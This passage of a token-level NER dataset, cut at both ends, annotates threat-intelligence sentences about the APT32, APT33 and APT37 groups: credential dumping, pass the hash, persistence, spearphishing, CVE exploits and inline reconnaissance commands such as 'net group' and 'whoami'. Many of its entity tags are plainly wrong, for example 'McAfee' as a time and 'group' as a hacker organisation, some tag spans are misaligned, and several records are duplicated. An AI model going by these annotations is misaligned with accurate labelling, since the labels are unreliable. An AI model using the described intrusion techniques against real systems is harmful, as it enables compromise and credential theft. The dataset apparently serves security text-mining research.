- "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "APT32", - "backdoor", - "can", - "use", - "HTTP", - "over", - "a", - "non-standard", - "TCP", - "port", - "(e.g", - "14146)", - "which", - "is", - "specified", - "in", - "the", - "backdoor", - "configuration." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "used", - "GetPassword_x64", - "to", - "harvest", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "have", - "replaced", - "Microsoft", - "Outlook's", - "VbaProject.OTM", - "file", - "to", - "install", - "a", - "backdoor", - "macro", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "pass", - "the", - "hash", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "successfully", - "gained", - "remote", - "access", - "by", - "using", - "pass", - "the", - "ticket." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-OffAct", - "I-OffAct", - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "PowerShell-based", - "tools,", - "PowerShell", - "one-liners,", - "and", - "shellcode", - "loaders", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "B-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "malware", - "has", - "injected", - "a", - "Cobalt", - "Strike", - "beacon", - "into", - "Rundll32.exe." - ], - "ner_tags": [ - "B-Idus", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "PubPrn.vbs", - "within", - "execution", - "scripts", - "to", - "execute", - "malware,", - "possibly", - "bypassing", - "defenses." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32's", - "backdoor", - "can", - "query", - "the", - "Windows", - "Registry", - "to", - "gather", - "system", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "established", - "persistence", - "using", - "Registry", - "Run", - "keys,", - "both", - "to", - "execute", - "PowerShell", - "and", - "VBS", - "scripts", - "as", - "well", - "as", - "to", - "execute", - "their", - "backdoor", - "directly." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "created", - "a", - "Scheduled", - "Task/Job", - "that", - "used", - "regsvr32.exe", - "to", - "execute", - "a", - "COM", - "scriptlet", - "that", - "dynamically", - "downloaded", - "a", - "backdoor", - "and", - "injected", - "it", - "into", - "memory.", - "The", - "group", - "has", - "also", - "used", - "regsvr32", - "to", - "run", - "their", - "backdoor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "enumerated", - "DC", - "servers", - "using", - "the", - "command", - "<code>net", - "group", - "\"Domain", - "Controllers\"", - "/domain</code>.", - "The", - "group", - "has", - "also", - "used", - "the", - "<code>ping</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "moved", - "and", - "renamed", - "pubprn.vbs", - "to", - "a", - ".txt", - "file", - "to", - "avoid", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "malware", - "has", - "used", - "rundll32.exe", - "to", - "execute", - "an", - "initial", - "infection", - "process." - ], - "ner_tags": [ - "B-Idus", - "B-Tool", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "used", - "Net", - "to", - "use", - "Windows'", - "hidden", - "network", - "shares", - "to", - "copy", - "their", - "tools", - "to", - "remote", - "machines", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "scheduled", - "tasks", - "to", - "persist", - "on", - "victim", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32's", - "backdoor", - "has", - "used", - "Windows", - "services", - "as", - "a", - "way", - "to", - "execute", - "its", - "malicious", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "set", - "up", - "Facebook", - "pages", - "in", - "tandem", - "with", - "fake", - "websites." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "APT32", - "compromised", - "McAfee", - "ePO", - "to", - "move", - "laterally", - "by", - "distributing", - "malware", - "as", - "a", - "software", - "deployment", - "task." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Time", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "sent", - "spearphishing", - "emails", - "with", - "a", - "malicious", - "executable", - "disguised", - "as", - "a", - "document", - "or", - "spreadsheet." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "sent", - "spearphishing", - "emails", - "containing", - "malicious", - "links." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "malicious", - "links", - "to", - "direct", - "users", - "to", - "web", - "pages", - "designed", - "to", - "harvest", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "collected", - "the", - "OS", - "version", - "and", - "computer", - "name", - "from", - "victims.", - "One", - "of", - "the", - "group's", - "backdoors", - "can", - "also", - "query", - "the", - "Windows", - "Registry", - "to", - "gather", - "system", - "information,", - "and", - "another", - "macOS", - "backdoor", - "performs", - "a", - "fingerprint", - "of", - "the", - "machine", - "on", - "its", - "first", - "connection", - "to", - "the", - "C&C", - "server.", - "APT32", - "executed", - "shellcode", - "to", - "identify", - "the", - "name", - "of", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "used", - "the", - "<code>ipconfig", - "/all</code>", - "command", - "to", - "gather", - "the", - "IP", - "address", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "used", - "the", - "<code>netstat", - "-anpo", - "tcp</code>", - "command", - "to", - "display", - "TCP", - "connections", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "collected", - "the", - "victim's", - "username", - "and", - "executed", - "the", - "<code>whoami</code>", - "command", - "on", - "the", - "victim's", - "machine.", - "APT32", - "executed", - "shellcode", - "to", - "collect", - "the", - "username", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "scheduled", - "task", - "raw", - "XML", - "with", - "a", - "backdated", - "timestamp", - "of", - "June", - "2,", - "2016.", - "The", - "group", - "has", - "also", - "set", - "the", - "creation", - "time", - "of", - "the", - "files", - "dropped", - "by", - "the", - "second", - "stage", - "of", - "the", - "exploit", - "to", - "match", - "the", - "creation", - "time", - "of", - "kernel32.dll.", - "Additionally,", - "APT32", - "has", - "used", - "a", - "random", - "value", - "to", - "modify", - "the", - "timestamp", - "of", - "the", - "file", - "storing", - "the", - "clientID." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Time", - "O", - "B-Time", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "Mimikatz", - "and", - "Cobalt", - "Strike,", - "and", - "a", - "variety", - "of", - "other", - "open-source", - "tools", - "from", - "GitHub." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "hosted", - "malicious", - "payloads", - "in", - "Dropbox,", - "Amazon", - "S3,", - "and", - "Google", - "Drive", - "for", - "use", - "during", - "targeting." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "macros,", - "COM", - "scriptlets,", - "and", - "VBS", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Way", - "B-Tool", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "JavaScript", - "that", - "communicates", - "over", - "HTTP", - "or", - "HTTPS", - "to", - "attacker", - "controlled", - "domains", - "to", - "download", - "additional", - "frameworks.", - "The", - "group", - "has", - "also", - "used", - "downloaded", - "encrypted", - "payloads", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "Dropbox,", - "Amazon", - "S3,", - "and", - "Google", - "Drive", - "to", - "host", - "malicious", - "downloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "set", - "up", - "Dropbox,", - "Amazon", - "S3,", - "and", - "Google", - "Drive", - "to", - "host", - "malicious", - "downloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "Web", - "shells", - "to", - "maintain", - "access", - "to", - "victim", - "websites." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "cmd.exe", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "used", - "WMI", - "to", - "deploy", - "their", - "tools", - "on", - "remote", - "machines", - "and", - "to", - "gather", - "information", - "about", - "the", - "Outlook", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "modified", - "Windows", - "Services", - "to", - "ensure", - "PowerShell", - "scripts", - "were", - "loaded", - "on", - "the", - "system.", - "APT32", - "also", - "creates", - "a", - "Windows", - "service", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "WinRAR", - "to", - "compress", - "data", - "prior", - "to", - "exfil." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "a", - "variety", - "of", - "publicly", - "available", - "tools", - "like", - "LaZagne", - "to", - "gather", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "compromised", - "Office", - "365", - "accounts", - "in", - "tandem", - "with", - "Ruler", - "in", - "an", - "attempt", - "to", - "gain", - "control", - "of", - "endpoints." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "a", - "variety", - "of", - "publicly", - "available", - "tools", - "like", - "LaZagne", - "to", - "gather", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "a", - "variety", - "of", - "publicly", - "available", - "tools", - "like", - "LaZagne", - "to", - "gather", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "a", - "variety", - "of", - "publicly", - "available", - "tools", - "like", - "LaZagne", - "to", - "gather", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "base64", - "to", - "encode", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "FTP", - "to", - "exfiltrate", - "files", - "(separately", - "from", - "the", - "C2", - "channel)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "attempted", - "to", - "exploit", - "a", - "known", - "vulnerability", - "in", - "WinRAR", - "(CVE-2018-20250),", - "and", - "attempted", - "to", - "gain", - "remote", - "code", - "execution", - "via", - "a", - "security", - "bypass", - "vulnerability", - "(CVE-2017-11774)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "a", - "publicly", - "available", - "exploit", - "for", - "CVE-2017-0213", - "to", - "escalate", - "privileges", - "on", - "a", - "local", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Exp", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "a", - "variety", - "of", - "publicly", - "available", - "tools", - "like", - "Gpppassword", - "to", - "gather", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "downloaded", - "additional", - "files", - "and", - "programs", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "a", - "variety", - "of", - "publicly", - "available", - "tools", - "like", - "LaZagne", - "to", - "gather", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "a", - "variety", - "of", - "publicly", - "available", - "tools", - "like", - "LaZagne,", - "Mimikatz,", - "and", - "ProcDump", - "to", - "dump", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "malicious", - "e-mail", - "attachments", - "to", - "lure", - "victims", - "into", - "executing", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "lured", - "users", - "to", - "click", - "links", - "to", - "malicious", - "HTML", - "applications", - "delivered", - "via", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "SniffPass", - "to", - "collect", - "credentials", - "by", - "sniffing", - "network", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "HTTP", - "over", - "TCP", - "ports", - "808", - "and", - "880", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "password", - "spraying", - "to", - "gain", - "access", - "to", - "target", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "utilized", - "PowerShell", - "to", - "download", - "files", - "from", - "the", - "C2", - "server", - "and", - "run", - "various", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "deployed", - "a", - "tool", - "known", - "as", - "DarkComet", - "to", - "the", - "Startup", - "folder", - "of", - "a", - "victim,", - "and", - "used", - "Registry", - "run", - "keys", - "to", - "gain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "created", - "a", - "scheduled", - "task", - "to", - "execute", - "a", - ".vbe", - "file", - "multiple", - "times", - "a", - "day." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "sent", - "spearphishing", - "e-mails", - "with", - "archive", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "sent", - "spearphishing", - "emails", - "containing", - "links", - "to", - ".hta", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "base64", - "to", - "encode", - "command", - "and", - "control", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "AES", - "for", - "encryption", - "of", - "command", - "and", - "control", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "obtained", - "and", - "leveraged", - "publicly-available", - "tools", - "for", - "early", - "intrusion", - "activities." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "valid", - "accounts", - "for", - "initial", - "access", - "and", - "privilege", - "escalation." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-OffAct", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "VBScript", - "to", - "initiate", - "the", - "delivery", - "of", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "used", - "HTTP", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT33", - "has", - "attempted", - "to", - "use", - "WMI", - "event", - "subscriptions", - "to", - "establish", - "persistence", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "used", - "an", - "audio", - "capturing", - "utility", - "known", - "as", - "SOUNDWAVE", - "that", - "captures", - "microphone", - "input." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "APT37", - "leverages", - "social", - "networking", - "sites", - "and", - "cloud", - "platforms", - "(AOL,", - "Twitter,", - "Yandex,", - "Mediafire,", - "pCloud,", - "Dropbox,", - "and", - "Box)", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Idus", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "O", - "B-Org", - "B-Org", - "B-Org", - "B-Org", - "B-Org", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "a", - "function", - "in", - "the", - "initial", - "dropper", - "to", - "bypass", - "Windows", - "UAC", - "in", - "order", - "to", - "execute", - "the", - "next", - "payload", - "with", - "higher", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "used", - "Ruby", - "scripts", - "to", - "execute", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "used", - "a", - "credential", - "stealer", - "known", - "as", - "ZUMKONG", - "that", - "can", - "harvest", - "usernames", - "and", - "passwords", - "stored", - "in", - "browsers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "collected", - "data", - "from", - "victims'", - "local", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "access", - "to", - "destructive", - "malware", - "that", - "is", - "capable", - "of", - "overwriting", - "a", - "machine's", - "Master", - "Boot", - "Record", - "(MBR)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "used", - "strategic", - "web", - "compromises,", - "particularly", - "of", - "South", - "Korean", - "websites,", - "to", - "distribute", - "malware.", - "The", - "group", - "has", - "also", - "used", - "torrent", - "file-sharing", - "sites", - "to", - "more", - "indiscriminately", - "disseminate", - "malware", - "to", - "victims.", - "As", - "part", - "of", - "their", - "compromises,", - "the", - "group", - "has", - "used", - "a", - "Javascript", - "based", - "profiler", - "called", - "RICECURRY", - "to", - "profile", - "a", - "victim's", - "web", - "browser", - "and", - "deliver", - "malicious", - "code", - "accordingly." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "I-Area", - "I-Area", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "used", - "Windows", - "DDE", - "for", - "execution", - "of", - "commands", - "and", - "a", - "malicious", - "VBS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "used", - "exploits", - "for", - "Flash", - "Player", - "(CVE-2016-4117,", - "CVE-2018-4878),", - "Word", - "(CVE-2017-0199),", - "Internet", - "Explorer", - "(CVE-2020-1380", - "and", - "CVE-2020-26411),", - "and", - "Microsoft", - "Edge", - "(CVE-2021-26411)", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "B-Features", - "B-Features", - "B-Tool", - "B-Features", - "I-Tool", - "I-Tool", - "B-Features", - "O", - "B-Features", - "O", - "I-Tool", - "I-Tool", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "downloaded", - "second", - "stage", - "malware", - "from", - "compromised", - "websites." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "APT37", - "has", - "signed", - "its", - "malware", - "with", - "an", - "invalid", - "digital", - "certificates", - "listed", - "as", - "“Tencent", - "Technology", - "(Shenzhen)", - "Company", - 